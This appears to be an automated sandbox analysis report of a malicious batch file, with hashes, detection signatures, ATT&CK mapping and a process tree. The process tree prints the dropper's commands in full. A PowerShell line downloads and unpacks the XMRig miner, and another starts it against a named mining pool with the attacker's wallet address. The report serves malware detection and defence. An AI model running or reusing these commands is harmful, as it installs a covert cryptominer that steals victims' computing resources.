Resubmissions

Analysis

  • max time kernel
    329s
  • max time network
    1786s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20-05-2024 20:53

General

  • Target

    8.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4896
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3616

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    42d4b1d78e6e092af15c7aef34e5cf45

    SHA1

    6cf9d0e674430680f67260194d3185667a2bb77b

    SHA256

    c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

    SHA512

    d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    c2efad3d2cad39ba3a2084d797c02ffa

    SHA1

    c3ccc0e633832f47f387f2ccb21b41f521f499f5

    SHA256

    1728555f6a96fce17e32362473f43104ab0cba3b5ae38763ee2f4e98e7d779b6

    SHA512

    dd95b981ed8f97ebfaa17cef8bb59734feb8a2ccff60a4642f7714cf54bc8d2b4623720584ae36e00ab9789cd85dd4b45a8b1b6464ddde09bce39823282a75be

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zreajrss.oae.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3-msvc-win64.zip
    Filesize

    2.5MB

    MD5

    cef0ae1ab544e40b659261a4e07fe48f

    SHA1

    e5ff855ce3c7726a50eb50a634ff9f406b3df093

    SHA256

    713263085499ae626a6148fab67932c9a69611b21ac3d04cf52a5e23495f902e

    SHA512

    1fb23b385e6cff3653f0b4b397d092c7be4df62899c97e18f675df2024e5f06ef2596fb626b85ae2ef7d7583c5bf54b00dba1a5ad566c2707a669a48d9814ba8

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
    Filesize

    6.1MB

    MD5

    c0f8959614ae06561216158d78a787e5

    SHA1

    73167d1fd0cee1c96a6505606d21cbfe4369eb00

    SHA256

    e199d88569fb54346d5fa20ee7b59b2ea6f16f4ecca3ea1e1c937b11aab7b2b0

    SHA512

    a24fcf344d08c64ac301d5e4979f062b5e28e8e4acf1d2790916149ffe7726b0c4a11e0775aeba6b841d2d5081e1bd13e2b80390bf9bfbc44d67e54ec07cd746

  • memory/3616-121-0x000001A498460000-0x000001A498480000-memory.dmp
    Filesize

    128KB

  • memory/3936-25-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-27-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
    Filesize

    4KB

  • memory/3936-28-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-29-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-34-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-3-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
    Filesize

    4KB

  • memory/3936-5-0x000001D951900000-0x000001D951922000-memory.dmp
    Filesize

    136KB

  • memory/3936-6-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-26-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/3936-9-0x000001D951AB0000-0x000001D951B26000-memory.dmp
    Filesize

    472KB

  • memory/4896-67-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/4896-93-0x000001B27AA80000-0x000001B27AA8A000-memory.dmp
    Filesize

    40KB

  • memory/4896-42-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/4896-80-0x000001B27AD40000-0x000001B27AD52000-memory.dmp
    Filesize

    72KB

  • memory/4896-117-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/4896-41-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB

  • memory/4896-40-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
    Filesize

    9.9MB